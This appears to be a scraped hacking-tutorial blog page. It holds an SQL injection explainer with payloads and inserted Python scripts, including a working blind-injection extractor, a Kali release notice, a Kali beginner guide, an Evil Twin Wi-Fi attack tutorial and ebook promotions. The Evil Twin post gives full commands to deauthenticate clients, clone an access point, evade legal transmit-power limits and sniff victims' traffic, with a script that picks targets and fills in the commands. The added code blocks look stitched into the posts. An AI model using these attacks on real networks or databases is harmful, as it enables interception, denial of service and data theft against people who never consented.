
Tuesday, 17 February 2015

SQL Injection Intermediate Level

This is a theoretical post about the types of SQL injection attacks and the concepts behind them. I have added it here because so far we have been dealing with URLs, and will continue to do so. The attacker has no direct way to write complete queries; he or she can only change the URL or the input form. However, knowledge of the MySQL (or other DBMS) side of the attack is still necessary, because you will need it when you deal with more robust websites where the standard attacks don't work and you need to get creative. Before reading this post, I recommend these three:



  • SQL Injection Basics (theoretical yet important)
  • Manual SQL Injection (using web browser only)
  • Automated SQL Injection using SQLMap (Kali Linux needed) 


  Now we will proceed to the actual content of the post:

    Types of SQL Injection attacks

    • SQL injection + insufficient authentication
    • SQL injection + DDoS attacks
    • SQL injection + DNS hijacking
    • SQL injection + XSS

    Technical implementations

    Incorrectly filtered escape characters

    This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statements performed on the database by the end-user of the application.
    The following line of code illustrates this vulnerability:
    statement = "SELECT * FROM users WHERE name ='" + userName + "';"
    This SQL code is designed to pull up the records of the specified username from its table of users. However, if the "userName" variable is crafted in a specific way by a malicious user, the SQL statement may do more than the code author intended. For example, setting the "userName" variable as:
    ' or '1'='1
    or using a comment to block out the rest of the query. There are three common comment styles: -- (standard SQL; MySQL requires a space after it, which is why the first line below ends with a space), # (MySQL only) and /* ... */. All three lines have a space at the end:
    ' or '1'='1' -- 
    ' or '1'='1' #
    ' or '1'='1' /*

    renders one of the following SQL statements by the parent language:
    SELECT * FROM users WHERE name = '' OR '1'='1';
    SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
    If this code were to be used in an authentication procedure then this example could be used to force the selection of a valid username because the evaluation of '1'='1' is always true.
    The following value of "userName" in the statement below would cause the deletion of the "users" table as well as the selection of all data from the "userinfo" table (in essence revealing the information of every user), using an API that allows multiple statements:
    a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't
    This input renders the final SQL statement as follows:
    SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't';
    While many SQL server implementations allow multiple statements to be executed with one call in this way, some SQL APIs, such as PHP's mysql_query() function, do not allow this for security reasons. This prevents attackers from injecting entirely separate ("stacked") queries, but does not stop them from modifying the query they are already inside, as the ' or '1'='1 example shows.

    Incorrect type handling

    This form of SQL injection occurs when a user-supplied field is not strongly typed or is not checked for type constraints. This could take place when a numeric field is to be used in a SQL statement, but the programmer makes no checks to validate that the user supplied input is numeric. For example:
    statement := "SELECT * FROM userinfo WHERE id =" + a_variable + ";"
    It is clear from this statement that the author intended a_variable to be a number correlating to the "id" field. However, if it is in fact an arbitrary string then the end-user may manipulate the statement as they choose, and because the value is never enclosed in quotes no quote or escape character is needed to break out. For example, setting a_variable to
    1;DROP TABLE users
    will drop (delete) the "users" table from the database, provided the API executes stacked statements, since the SQL becomes:
    SELECT * FROM userinfo WHERE id=1;DROP TABLE users;
    Even where stacked statements are refused, a value such as 1 OR 1=1 still rewrites the WHERE clause and returns every row of the table.
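Both cases above carried through end to end, as an added example that is not part of the original post (nor of the Wikipedia text it is taken from): a Python script against an in-memory SQLite database standing in for MySQL, with constructed user rows. It shows the string-concatenated queries returning every row for the ' or '1'='1 and 1 OR 1=1 payloads, the parameterised versions treating the same input as plain data, the type check rejecting a non-numeric id, and the stacked a';DROP TABLE users; ... payload being refused by an API that executes one statement per call (Python's sqlite3 behaves like PHP's mysql_query() here). Table and column names follow the post; the data and function names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed demo data (not from the original post): three users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.execute("CREATE TABLE userinfo (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "pw")])
    db.executemany("INSERT INTO userinfo VALUES (?, ?, ?)",
                   [(1, "alice", "alice@example.com"), (2, "bob", "bob@example.com"),
                    (3, "carol", "carol@example.com")])
    return db


def find_user_vulnerable(db, user_name):
    # The pattern from the post: the value is spliced into the SQL text, so a
    # quote inside user_name ends the literal and the rest becomes SQL syntax.
    statement = "SELECT * FROM users WHERE name ='" + user_name + "'"
    return db.execute(statement).fetchall()


def find_user_safe(db, user_name):
    # Parameterised query: the driver passes the value separately from the SQL
    # text, so quotes and comment sequences inside user_name stay data.
    return db.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall()


def userinfo_vulnerable(db, a_variable):
    # Numeric field concatenated with no type check ("incorrect type handling"):
    # no quote is needed to break out because the value was never quoted.
    statement = "SELECT * FROM userinfo WHERE id =" + a_variable
    return db.execute(statement).fetchall()


def userinfo_safe(db, a_variable):
    # Enforce the type before the value reaches the query; int() rejects "1 OR 1=1".
    return db.execute("SELECT * FROM userinfo WHERE id = ?", (int(a_variable),)).fetchall()


def safe_rejects(db, a_variable):
    """True if userinfo_safe refuses the value instead of querying with it."""
    try:
        userinfo_safe(db, a_variable)
    except ValueError:
        return True
    return False


def stacked_query_blocked(db, user_name):
    """Send the a';DROP TABLE users; ... payload through an API that refuses
    stacked statements. Returns True if the call was rejected and the users
    table survived with all of its rows."""
    statement = "SELECT * FROM users WHERE name ='" + user_name + "'"
    try:
        db.execute(statement)
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # sqlite3: "You can only execute one statement at a time."
        rejected = True
    else:
        rejected = False
    rows = db.execute("SELECT count(*) FROM users").fetchone()[0]
    return rejected and rows == 3


if __name__ == "__main__":
    db = make_db()
    payload = "' or '1'='1"
    print("vulnerable:", find_user_vulnerable(db, payload))    # every row
    print("safe:      ", find_user_safe(db, payload))           # no rows
    print("numeric:   ", userinfo_vulnerable(db, "1 OR 1=1"))   # every row
    print("type check:", safe_rejects(db, "1 OR 1=1"))          # True
    stacked = "a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't"
    print("stacked:   ", stacked_query_blocked(db, stacked))    # True
```

The fix is the same in every case: never build the SQL text out of user input. Bind values as parameters, and for numeric fields convert to the intended type first so that anything that is not a number is rejected before a query is built at all.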

    Blind SQL injection

    Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established.

    Conditional responses

    One type of blind SQL injection forces the database to evaluate a logical statement on an ordinary application screen. As an example, a book review website uses a query string to determine which book review to display. So the URL http://books.example.com/showReview.php?ID=5 would cause the server to run the query
    SELECT * FROM bookreviews WHERE ID = Value(ID);
    from which it would populate the review page with data from the review with ID 5, stored in the table bookreviews. The query happens completely on the server; the user does not know the names of the database, table, or fields, nor does the user see the query text. The user only sees that the above URL returns a book review. An attacker can load the URLs http://books.example.com/showReview.php?ID=5 OR 1=1 and http://books.example.com/showReview.php?ID=5 AND 1=2 (spaces shown unencoded for readability; the browser will percent-encode them), which would result in the queries
    SELECT * FROM bookreviews WHERE ID = 5 OR 1=1;
    SELECT * FROM bookreviews WHERE ID = 5 AND 1=2;
    respectively. The value is concatenated unquoted, so no quote character is needed to break out. If a review loads with the "1=1" URL and a blank or error page is returned from the "1=2" URL, and the application has not been written to detect and reject the invalid input, the site is likely vulnerable to SQL injection, because both injected conditions were evaluated by the database. The attacker may proceed with this query string, designed to reveal the version number of MySQL running on the server:
    http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4
    which would show the book review on a server running MySQL 4 and a blank or error page otherwise. The attacker can continue to use code within query strings to glean more information from the server, one true/false answer per request, until another avenue of attack is discovered or his or her goals are achieved.
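The conditional-response technique above carried through to a full extraction, as an added example that is not part of the original post or of the Wikipedia text. It is Python against an in-memory SQLite database: show_review() plays the part of showReview.php (the ID value is concatenated unquoted, as in the query above, and the only thing the caller learns is whether a review was rendered), while sqlite_version(), substr() and unicode() stand in for MySQL's @@version, substring() and ascii(). The review rows are constructed. The extraction first finds the length of the version string, then binary-searches each character's code point, so the whole string comes out at roughly seven requests per character instead of one request per candidate value.

```python
import sqlite3

# Constructed stand-in for the books.example.com database (not from the post).
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE bookreviews (ID INTEGER PRIMARY KEY, title TEXT, review TEXT)")
db.executemany("INSERT INTO bookreviews VALUES (?, ?, ?)",
               [(5, "Applied Cryptography", "Dense but rewarding."),
                (6, "Hacking the Xbox", "A hardware classic.")])


def show_review(id_param):
    """Stand-in for showReview.php. The ID query-string value is pasted into the
    WHERE clause unquoted, as in the post. The caller learns only whether a
    review was rendered (True) or the page came back blank (False)."""
    sql = "SELECT title FROM bookreviews WHERE ID = " + id_param
    try:
        return len(db.execute(sql).fetchall()) > 0
    except sqlite3.Error:
        return False  # an error page looks the same as a blank page to the attacker


def ground_truth():
    """Only for checking the result; the attacker cannot call this."""
    return sqlite3.sqlite_version


def extract_version(max_len=40):
    """Recover the DBMS version string one character at a time using only the
    True/False signal from show_review. Returns (version, requests_sent)."""
    requests = 0

    def probe(condition):
        nonlocal requests
        requests += 1
        return show_review("5 AND (" + condition + ")")

    # Step 1: find the length so we know when to stop.
    length = 0
    for n in range(1, max_len + 1):
        if probe("length(sqlite_version()) = %d" % n):
            length = n
            break
    if length == 0:
        raise ValueError("no length up to %d matched; the oracle is not working" % max_len)

    # Step 2: binary-search each character's code point within printable ASCII.
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if probe("unicode(substr(sqlite_version(), %d, 1)) > %d" % (pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars), requests


if __name__ == "__main__":
    print(show_review("5"))           # True: the review exists
    print(show_review("5 OR 1=1"))    # True
    print(show_review("5 AND 1=2"))   # False: the tell-tale blank page
    version, n = extract_version()
    print("version %s recovered with %d requests" % (version, n))
```

Against a real MySQL target the same loop would send substring(@@version,i,1) comparisons through the ID parameter; the request count is what makes blind injection slow and also what makes it visible in web server logs, where one IP issuing hundreds of requests for the same review ID with varying query strings stands out.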

    Second Order SQL Injection

    Second order SQL injection occurs when submitted values contain malicious commands that are stored rather than executed immediately. In some cases, the application may correctly encode a SQL statement and store it as valid SQL. Then, another part of that application without controls to protect against SQL injection might execute that stored SQL statement. This attack requires more knowledge of how submitted values are later used. Automated web application security scanners would not easily detect this type of SQL injection and may need to be manually instructed where to check for evidence that it is being attempted.
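A second-order injection of the kind described, as an added example that is not from the original post: Python with an in-memory SQLite database and a constructed admin account. Registration binds the username as a parameter and stores admin'-- verbatim, which is correct; a later password-change routine trusts the username it read back from the database and concatenates it, so the -- comments out the old-password check and the admin row is updated. The bound version of the same routine is included for contrast. All names and data are assumptions.

```python
import sqlite3

# Constructed demo (not from the post): one pre-existing admin account.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")


def register(name, password):
    """Registration is done properly: the name is bound as a parameter, so a
    quote inside it is stored verbatim as data. Nothing fires here."""
    db.execute("INSERT INTO users (name, password) VALUES (?, ?)", (name, password))


def password_of(name):
    row = db.execute("SELECT password FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def change_password_vulnerable(session_user, old, new):
    """Later code reads the username back from the database into the session
    and trusts it ('it did not come from the request'), concatenating it into
    an UPDATE. Returns the number of rows changed."""
    sql = ("UPDATE users SET password = '" + new + "' WHERE name = '" + session_user
           + "' AND password = '" + old + "'")
    return db.execute(sql).rowcount


def change_password_safe(session_user, old, new):
    """Same logic with every value bound; stored data stays data."""
    return db.execute("UPDATE users SET password = ? WHERE name = ? AND password = ?",
                      (new, session_user, old)).rowcount


def second_order_demo():
    """The attacker registers as  admin'--  (note the trailing space) and then
    changes 'their own' password with a wrong old password.
    Returns (rows changed, admin's password afterwards)."""
    attacker = "admin'-- "
    register(attacker, "attacker-pw")
    # The UPDATE becomes
    #   UPDATE users SET password = 'owned' WHERE name = 'admin'-- ' AND password = '...'
    # so the old-password check is commented out and admin's row is updated.
    changed = change_password_vulnerable(attacker, "wrong-old-password", "owned")
    return changed, password_of("admin")


if __name__ == "__main__":
    print(second_order_demo())  # (1, 'owned')
```

The lesson for scanners and reviewers is the one the paragraph gives: the injection point (registration) and the place where the payload executes (password change) are different requests, so testing each endpoint in isolation shows nothing. Every query that builds SQL from strings is suspect, whether the string came from a request, a session, a file or the database itself.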

    This post is licensed under Creative Commons Attribution-ShareAlike 3.0. This license permits sharing, but requires attribution and that the content be shared under the same or a similar license. The source of the content in this page is -
    https://en.wikipedia.org/wiki/SQL_injection
    License details can be read here https://en.wikipedia.org/wiki/Wikipedia:Text_of_Creative_Commons_Attribution-ShareAlike_3.0_Unported_License

    Blind SQLi Tutorial

    You may read this tutorial if you have gone through the content of this page and are ready to go to the next level.

    Wednesday, 11 February 2015

    Kali Linux 1.1.0 Released

    On 9th February 2015, Kali 1.1.0 was released. This is the latest version so far, and has a lot of major changes. Here's what the official Kali website had to say about it. Kali 1.1.0 can be downloaded from here.




    After almost two years of public development (and another year behind the scenes), we are proud to announce our first point release of Kali Linux – version 1.1.0. This release brings with it a mix of unprecedented hardware support as well as rock solid stability. For us, this is a real milestone as this release epitomizes the benefits of our move from BackTrack to Kali Linux over two years ago. As we look at a now mature Kali, we see a versatile, flexible Linux distribution, rich with useful security and penetration testing related features, running on all sorts of weird and wonderful ARM hardware. But enough talk, here are the goods:
    • The new release runs a 3.18 kernel, patched for wireless injection attacks.
    • Our ISO build systems are now running off live-build 4.x.
    • Improved wireless driver support, due to both kernel and firmware upgrades.
    • NVIDIA Optimus hardware support.
    • Updated virtualbox-tool, openvm-tools and vmware-tools packages and instructions.
    • A whole bunch of fixes and updates from our bug-tracker changelog.
    • And most importantly, we changed grub screens and wallpapers!

    Download or Upgrade Kali Linux 1.1.0

    You can download the new version from our Kali Linux Download page, where you’ll also find mini-installer ISOs for both 32 and 64 bit CPU architectures. You can expect updated VMWare and multiple ARM image releases to be posted in the Offensive Security custom Kali Linux image download page in the next few days. As usual, if you’ve already got Kali Linux installed and running, there’s no need to re-download the image as you can simply update your existing operating system using simple apt commands:
    apt-get update
    apt-get dist-upgrade

    Wednesday, 16 July 2014

    Tutorial on Hacking With Kali Linux


    Hacking With Kali Linux


    Why Kali Linux?


    With Kali Linux, hacking becomes much easier since you have all the tools (more than 300 pre-installed tools) you are probably ever gonna need. Others can be downloaded easily. Now this tutorial will get you started and you'll be hacking with Kali Linux before you know it.




    The problem with beginners

    Now, I've been dealing with beginners for a long time. What they want is magic: a tool which is easy to use, works on Windows, can be downloaded by searching on Google and clicking on the first link we see, and will do all the hacking itself at the push of a button. Sadly, no such tool exists. Hacking is an art, and it takes years of practice to master it. So how to get started? Having no idea about hacking is okay, but being a newbie with computers in general is not allowed. When I say beginner, I mean someone who has no experience with programming and with hacking methodologies. I don't mean someone who needs a 1 page guide on how to download a tool. If you want to be a hacker, you have to work hard. So how to get started? (If you have already installed Kali Linux, click here to skip past the installation paragraphs and go to the hacking section of this post.)






    Getting Started

    Now, I am not boring you with theory (^ as if all this wasn't enough theory). My aim is to get you to the point where you can start hacking with Kali Linux as soon as possible. What I'm gonna do is tell you what to do. The process is rather simple:-


    Things get tough now

    If you have no previous experience with Linux, virtual machines and all that stuff, getting Kali Linux up and running won't be a piece of cake. You have 2 options:


    1. Read the Kali official documentation

    That will give you an idea of what a virtual machine is, how an OS can be run from USB, and how to create a partition and dual-boot 2 operating systems. This is what I recommend. For that, go to the Kali Official Documentation.

    2. Read my modified version of Kali documentation

    The second option is to look at these posts, which are just lightly modified versions of the Kali docs. They offer no advantage other than saving your time, since the official documentation covers much more than the posts here do, and you don't really need to know all that much... yet. I'm linking them up here:



      Command Line Interface

      Some bash commands
      Now, if you are really sure about becoming a hacker, you have to get used to Linux, and specifically the command line interface. It is often compared (and rightly so) to the command prompt of Windows, but the Linux CLI is much more efficient and capable than the command prompt. What you have to do is do all the usual tasks you do in Windows in the CLI of Linux. Use cd to navigate, poweroff to shut down, etc.
      A pretty awesome site for that is - http://linuxcommand.org/
      Going through the complete site is on its own enough exercise to keep you occupied for a month, but you can proceed gradually. The first few tutorials here will keep in mind that you don't have much info about cli, and will be really beginner friendly.



        Some Useful Commands:

        If you don't plan on learning all of linux cli commands, here are a few that will keep your boat afloat.
        1. The default username and password are 'root' and 'toor' (this is Kali 1.x; change the password as soon as you log in for the first time).
        2. Type 'poweroff' in the terminal to shut down.
        3. The apt-get command can be used to install tools and updates.
        4. apt-get update refreshes the package lists, and apt-get upgrade then updates all the programs installed on your machine.
        5. apt-get dist-upgrade does the same but will also install or remove packages when dependencies change, which is what you need to move to a new Kali release (i.e. it upgrades your OS).

        PS : Tapping <tab> while typing makes Kali complete the word for you . Double tapping <tab> makes it display all possible words starting with the incomplete word. Ctrl+c stops the functioning of any tool that is running. Pressing the up arrow key shows the command you last typed.


        Some Real Hacking With Kali Linux

        Assuming you've gone through the above steps and are comfortable with your new hacking environment, it's time to do some real hacking with Kali Linux. My recommendation would be to start by hacking a wifi, then do some penetration testing, and maybe read something on Denial of Service when you have free time. Links here-

        Hack wireless networks in Kali Linux using aircrack 

        Penetration Testing In Kali For Beginners

        Denial Of Service Attacks



          Monday, 14 July 2014

          Evil Twin Tutorial


          Prerequisites

          1. Kali Linux
          2. Prior experience with wireless hacking
          You will also need to install a tool (bridge utils) which doesn't come pre-installed in Kali. No big deal-
          apt-get install bridge-utils

          Objectives

          The whole process can be broken down into the following steps-
          1. Finding out about the access point (AP) you want to imitate, and then actually imitating it (i.e. creating another access point with the same SSID and everything). We'll use airmon-ng and airodump-ng to find the necessary info about the network, and airbase-ng to create its twin.
          2. Forcing the client to disconnect from the real AP and connect to yours. We'll use aireplay-ng to deauthenticate the client, and a stronger signal to make it connect to our network.
          3. Making sure the client doesn't notice that he connected to a fake AP. That basically means that we have to provide internet access to our client after he has connected to the fake wireless network. For that we will need to have internet access ourselves, which can be routed to our client.
          4. Have fun - monitor traffic from the client, maybe hack into his computer using metasploit.
          PS: The first 3 are the primary objectives; the last one is optional and not part of the evil twin attack as such. It is rather a man in the middle attack.


          Information Gathering - airmon-ng

          To see available wireless interfaces-
          iwconfig



          To start monitor mode on the available wireless interface (say wlan0)-
          airmon-ng start wlan0
          To capture packets from the air on the monitor mode interface (mon0)-
          airodump-ng mon0
          After about 30-40 seconds, press ctrl+c and leave the terminal as is. Open a new terminal.


          Creating the twin

          Now we will use airbase-ng to create the twin of one of the networks that showed up in the airodump-ng list. Remember, you need to have a client connected to the network (this client will be forced to disconnect from that network and connect to ours), so choose the network accordingly. Now after you have selected the network, take a note of its ESSID, BSSID and channel. Replace them in the given command-

          airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface name>
          If you face any problems, a shorter command will be-
          airbase-ng --essid <name of network> mon0 
          Remove the angle brackets (< & >) and choose any channel that you want. Also, the BSSID can be chosen randomly and doesn't have to match the target. The interface would be mon0 (or whichever card you want to use). The only thing that has to be identical about the twins is their ESSID (the name of the network). However, it is better to keep all parameters the same to make it look more real. After you are done entering the parameters and running the command, you'll see that airbase-ng has turned your wireless adapter into an access point.
          Note : airbase-ng as used here creates an open (unencrypted) network. A client that knows the target as a WPA/WPA2 network will usually not automatically join an open network of the same name, so the attack as described works most reliably when the target itself is an open network.
          Note : We will need to provide internet access to our client at a later stage. Make sure you have a method of connecting to the net other than wireless internet, because your card will be busy acting like an AP, and won't be able to provide you with internet connectivity. So, either you need another card, or broadband/ADSL/3G/4G/2G internet.


          Telling the client to get lost

          Now we have to ask the client to disconnect from that AP. Our twin won't work if the client is connected to the other network. We need to force it to disconnect from the real network and connect to the twin.
          For this, the first part is to force it to disconnect. Aireplay will do that for us-
          aireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one


          The 0 is the number of deauth bursts to send; 0 means keep sending them until you stop the command, while 1 would send a single burst, 2 two bursts, and so on. If you keep it as 0, your client will be disconnected within seconds, so fire up the command and press ctrl+c after a few seconds. Note that with only -a given, the deauth is sent to the broadcast address, so all the clients (not just one) connected to the network will disconnect. Disconnecting a specific client is also possible by adding -c <client MAC>.

          Not the real one, but why the fake one

          Even after being disconnected from the real AP, the client may choose to keep trying to connect to the same AP a few more times, instead of trying to connect to ours. We need to make our AP stand out, and for that, we need more signal strength. There are 2 ways to do that-

          1. Physically move closer to the client.
          2. Power up your wireless card to transmit at more power. 
          The latter can be done with the following command -
          iwconfig wlan0 txpower 27
          Here 27 is the transmission power in dBm. Some cards can't transmit at high power, and some can transmit at extremely high power. Alfa cards usually support up to 30 dBm, but many countries don't allow the card to transmit at such powers. Try changing 27 to 30 and you'll see what I mean. In Bolivia, however, 30 dBm is permitted, and by changing the regulatory domain we can overcome the power limitation.
          iw reg set BO
          iwconfig wlan0 txpower 30
          It is strongly advised not to break laws, as the transmission limits are there for a reason, and very high power can be harmful to health (I have no experimental evidence). Nevertheless, the client should connect to you if your signal strength is stronger than that of the real twin.

          Note : If you are unable to get your client to connect to you, there is another option. You can leave him with no options. If you keep transmitting the deauth packets continuously (i.e. don't press ctrl+c after the client has disconnected), he will have no choice but to connect to you. However, this is quite an unstable situation, and the client will go back to the real twin as soon as it gets the chance.


          Give the fake AP internet access

          Now we need to provide internet access to the fake AP. This can be done in various ways. In this tutorial, we will consider that we have an interface x0 which has internet connectivity. Now, if you are connected to net via wireless, replace x0 with wlan1 or wlan0, a 3G modem will show up as ppp0. Nevertheless, you just have to know which interface is providing you with internet, and you can route the internet access to your client.

          Interfaces

          • x0 - This has internet access
          • at0 - This is created by airbase-ng (the wired, tap-interface face of the wireless access point). If you can somehow give internet access to at0, then the clients connected to your fake wireless network can reach the net.
          • evil - This is an interface that we will create, whose job will be to actually bridge the networks.

          Creating evil

          We will use the bridge control utility, brctl, from the bridge-utils package installed earlier. Execute the following command-
          brctl addbr evil
          This will create the bridge. Now we have to specify which two interfaces have to be bridged-
          brctl addif evil x0
          brctl addif evil at0
          The member interfaces of a bridge must not carry an IP address of their own (the bridge gets the address), so we clear them to 0.0.0.0 and bring them up using-
          ifconfig x0 0.0.0.0 up 
          ifconfig at0 0.0.0.0 up
          Also bring up the evil interface (interfaces aren't up by default, so we have to do this explicitly)
          ifconfig evil up
          Now, to get an address for the bridge from the upstream DHCP server, we'll use dhclient (on current Kali the binary is simply dhclient; older Debian releases called it dhclient3)
          dhclient3 evil & 
          Finally, all the configuration is complete. You can execute ifconfig to see the results, which will show you all the interfaces you have created.
          Officially, the evil twin attack is complete. The client is now connected to your fake network and can use the internet pretty easily. Unless he checks the BSSID or the security type of the network he joined, he has no easy way to find out what went wrong. However, the last objective remains.
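The steps above collected into one script, as an added example that is not from the original post: Python that parses an airodump-ng CSV capture (the <prefix>-01.csv file written when airodump-ng is run with -w), picks the strongest AP that actually has a client associated, and returns the airbase-ng, aireplay-ng and brctl command lines from this tutorial with the target's BSSID, ESSID, channel and client MAC filled in. Nothing is executed; the CSV inside the script is constructed, the column positions are those of airodump-ng's CSV output, and ESSIDs containing commas are not handled. It also flags a WPA/WPA2 target, because the open twin airbase-ng creates will not be auto-joined by a client that knows that name as an encrypted network.

```python
import csv
import shlex
from io import StringIO

# Constructed sample in the layout airodump-ng writes with -w <prefix>: an AP
# section, a blank line, then a station section. Addresses and names are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2014-07-14 10:00:00, 2014-07-14 10:00:40, 6, 54, OPN, , , -42, 120, 0, 0.  0.  0.  0, 8, CoffeeAP, 
66:77:88:99:AA:BB, 2014-07-14 10:00:02, 2014-07-14 10:00:40, 11, 54, WPA2, CCMP, PSK, -70, 98, 0, 0.  0.  0.  0, 7, HomeNet, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
CC:DD:EE:FF:00:11, 2014-07-14 10:00:05, 2014-07-14 10:00:39, -50, 31, 00:11:22:33:44:55, CoffeeAP
"""


def parse_airodump_csv(text):
    """Return (aps, stations) from airodump-ng's CSV. AP columns used: 0 BSSID,
    3 channel, 5 Privacy, 8 Power, 13 ESSID. Station columns: 0 MAC, 3 Power, 5 BSSID."""
    aps, stations = [], []
    section = None
    for row in csv.reader(StringIO(text), skipinitialspace=True):
        if not row or not row[0].strip():
            continue
        head = row[0].strip()
        if head == "BSSID":
            section = "ap"
            continue
        if head == "Station MAC":
            section = "station"
            continue
        if section == "ap":
            aps.append({"bssid": head, "channel": int(row[3]), "privacy": row[5].strip(),
                        "power": int(row[8]), "essid": row[13].strip()})
        elif section == "station":
            stations.append({"mac": head, "power": int(row[3]), "bssid": row[5].strip()})
    return aps, stations


def choose_target(aps, stations):
    """Pick the strongest AP that has at least one associated client; the post
    stresses that a twin is pointless without a client to pull over."""
    clients = {}
    for s in stations:
        clients.setdefault(s["bssid"], []).append(s["mac"])
    candidates = [dict(ap, clients=clients[ap["bssid"]]) for ap in aps if ap["bssid"] in clients]
    if not candidates:
        return None
    return max(candidates, key=lambda ap: ap["power"])  # dBm: -42 beats -70


def plan_commands(target, mon="mon0", uplink="x0", bridge="evil"):
    """The command sequence from the post with the target's values filled in.
    Returns (commands, warnings); nothing is executed."""
    warnings = []
    if target["privacy"] != "OPN":
        warnings.append("%s is %s: clients with a saved profile will not auto-join an open twin"
                        % (target["essid"], target["privacy"]))
    essid = shlex.quote(target["essid"])
    cmds = ["airbase-ng -a %s --essid %s -c %d %s" % (target["bssid"], essid, target["channel"], mon)]
    for mac in target["clients"]:
        # -c aims the deauth at one station instead of the broadcast address.
        cmds.append("aireplay-ng --deauth 5 -a %s -c %s %s --ignore-negative-one"
                    % (target["bssid"], mac, mon))
    cmds += [
        "brctl addbr %s" % bridge,
        "brctl addif %s %s" % (bridge, uplink),
        "brctl addif %s at0" % bridge,
        "ifconfig %s 0.0.0.0 up" % uplink,
        "ifconfig at0 0.0.0.0 up",
        "ifconfig %s up" % bridge,
        "dhclient %s &" % bridge,  # the post writes dhclient3, the older Debian name
    ]
    return cmds, warnings


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    target = choose_target(aps, stations)
    cmds, warnings = plan_commands(target)
    for w in warnings:
        print("WARNING:", w)
    print("\n".join(cmds))
```

Reviewing the generated list before running it is the point: it makes you look at which network and which client you are about to deauthenticate, which is exactly the check that stops you from knocking every device off a network you had no business touching.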

          Have fun

          Now that the client is using the internet via our evil interface, we can do some evil stuff. This actually comes under a Man In The Middle attack (MITM), and I'll write a detailed tutorial for it later. However, for the time being, I will give you some idea what you can do.

          Sniffing using Wireshark

          Now all the packets that go from the user to the internet pass through our evil interface, and these packets can be monitored via Wireshark. I won't teach you how to use it here, since it is a GUI tool. You can take a look at their website to get an idea of how to use Wireshark.

          Special Thanks

          Matthew Bernard for his useful comment with some tips and a number of corrections http://www.kalitutorials.net/2014/07/evil-twin-tutorial.html?showComment=1406591245609#c5539483407421385761
          The screenshots have also been taken by him and provided to me for usage (I would love to see more helpful visitors like him).

          Sunday, 6 July 2014

          Sql Ebook: A Primer on SQL


          Sql Beginners Ebook

          Author's personal note

          Welcome to the second edition of A Primer on SQL. The first edition was more popular than I had initially imagined. The overwhelming response and the many readers who wrote back with comments or a simple thanks, led me to putting efforts into making the second edition. There are many corrections and clarifications throughout the chapters, along with two major changes: the introduction of using SQLite as an alternative DBMS in the text, and a new chapter on calculated fields. I hope that old and new readers find this text even more useful now in its presentation. I have tried to keep the spirit of the original text, a short introduction to the basics. As always, your questions, comments, criticism, encouragement and corrections are most welcome and you can e-mail me at rhlbatra[at]hotmail[dot]com. Rahul Batra (24th February 2014)

          Preface to the first edition

          Welcome to the first edition of A Primer on SQL. As you would be able to see, the book is fairly short and is intended as an introduction to the basics of SQL. No prior experience with SQL is necessary, but some knowledge of working with computers in general is required. My purpose of writing this was to provide a gentle tutorial on the syntax of SQL, so that the reader is able to recognize the parts of queries they encounter and even be able to write simple SQL statements and queries themselves.
          Your questions, comments, criticism, encouragement and corrections are most welcome and you can e-mail me at rhlbatra[at]hotmail[dot]com. I’ll try answering all on-topic mails and will try to include suggestions, errors and omissions in future editions. Rahul Batra (8th October 2012)
          PS: "Author's personal note" Author here means the author of the book not the one who wrote the blog post

          About the author

          Rahul Batra was first introduced to programming in 1996 in GWBASIC, but he did not seriously foray into it till 2001 when he started learning C++. Along the way, there were dabblings in many other languages like C, Ruby, Perl and Java. He has worked on Oracle, MySQL, Sybase ASA, Ingres and SQLite. Rahul has been programming professionally since 2006 and currently lives and works in Gurgaon, India.


          Download the book

          You can download the book for free here -  https://leanpub.com/aprimeronsql
          You can also choose to pay for the book which will help the author.


          Reverse Engineering Ebook : Hacking the XBOX


          About XBox Hacking

          The Xbox video game console from Microsoft® is an exciting piece of hardware, and not just because it can play the latest video games. The powerful and cheap Xbox has the potential to be used as a PC, an all-in-one media player, or even a web server. Unfortunately, there is a dearth of books that can teach a reader how to explore and modify modern electronic hardware such as the Xbox. Most electronics textbooks are theory-oriented and very focused, whereas real hacking requires a broad set of practical skills and knowledge.
